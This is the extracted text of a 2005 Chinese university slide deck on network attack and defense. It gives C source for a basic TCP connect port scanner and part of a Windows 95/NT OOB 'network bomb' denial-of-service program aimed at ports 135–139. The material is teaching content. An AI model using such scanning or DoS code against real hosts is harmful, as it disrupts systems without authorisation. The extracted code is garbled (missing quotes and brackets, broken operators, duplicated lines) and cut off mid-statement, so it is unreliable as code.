网络攻击与防御实例课件3.pptVIP

网络攻防技术实例 高平 信息科学技术学院信息对抗技术教研室 2005年3月 一、扫描器程序设计 要求具备网络攻防基本原理、C++编程技术、VBS脚本编程、基于TCP/IP的Win Scoket编程。 这个扫描器相当简单，只需要有一定的C语言编程能力和Socket知识就可以完成。当然，这个简单的扫描器并不是真正意义上的端口扫描器，因为它给出的信息太少了，而且这种扫描会在目标机上留下大量的记录，有经验的管理员一看就知道自己正在受到攻击，而且可以马上追踪到扫描者。如果要进一步扫描出更多信息并隐蔽自己，需要用到许多复杂的扫描技术。 #includewinsock2.h //包含windows套接字函数 #includestdio.h #pragma comment(lib,ws2_32) //将注释wsock32放置到lib文件中 #includestdlib.h #includewindows.h void main() {WSADATA ws; //将ws的数据类型声明为WSADATA SOCKET s; struct sockaddr_in addr; //系统保存套接字地址的结构体 int g1,k; long g2; printf(请输入要监测最大的端口号\n); scanf(%d,k); //下面用connect与端口建立连接，如果可以连接表示端口开启，否则关闭 for(int i=1;ik;i++) //循环1到k个端口 {g2=WSAStartup(0x0101,ws); s=socket(PF_INET,SOCK_STREAM,0); //创建套接字，TCP/IP协议，流Socket addr.sin_family=PF_INET; //规定使用IPv4协议 addr.sin_addr.s_addr=inet_addr(10.1.8.**); //指定为IP为10.1.8.**，实验时可以更改 addr.sin_port=htons(i); //端口号 if(s= =INVALID_SOCKET) break; //如果socket没有连接上，退出 g1=connect(s,(struct sockaddr*)addr,sizeof(addr)); //建立连接,判断端口是否关闭 if(g1!=0) {printf(2:%i 端口关闭\n,i); //指定的端口关闭 WSACleanup();} else { printf(10.1.8.**:%i 端口开启\n,i); }//指定的端口开放 closesocket(s); //关闭套接字 } } 二、OOB网络炸弹攻击编程 OOB（Out Of Band）是TCP/IP的一种传输模式，是早期Win95/NT的漏洞，攻击者向系统139端口传送0字节数据包时，Win系统自动恢复该数据碎片，导致系统资源耗尽，使机器出现蓝屏，以至死机。 常见有：WinNuke、Voob等网络炸弹。 该程序是用Visual C++6．0语言设计的，使用Scoket套接字的通信形式，利用数据包频繁的发送，造成接受方系统瘫痪。 #includewindows.h #includewinsock.h #includestdio.h #pragma comment(lib,wsock32.lib) /*定义攻击目标计算机的IP地址*/ char *IpAddr; int IpPort;//进攻端口135或137或139 char *Msg= You are bombed!; /*在被攻击者计算机上显示You are bombed!字符串*/ void Banner(void) { /*被段显示攻击者信息*/ printf(Windows95 OOB Bomber by jiaocang); } int main(int argc,char *argv[]) {/*开始定义变量*/ struct sockaddr_in sin; WSADATA wsaData; SOCKET sd; Banner();/*显示攻击者信息*/ { printf(usage:OOB Ip Port 135); return 1; } ? IpAddr=argv[1]; IpPort=atoi(argv[2]); /*初始化winsock*/ if(WSAStartup(MAKEWORD(2,2),wsaData)!=0) { printf(init socket error!); return 1; } IpAddr=argv[1]; IpPort=atoi(argv[2]); /*初始化winsock*/ If(WSAStartup(0x0101,wsaData)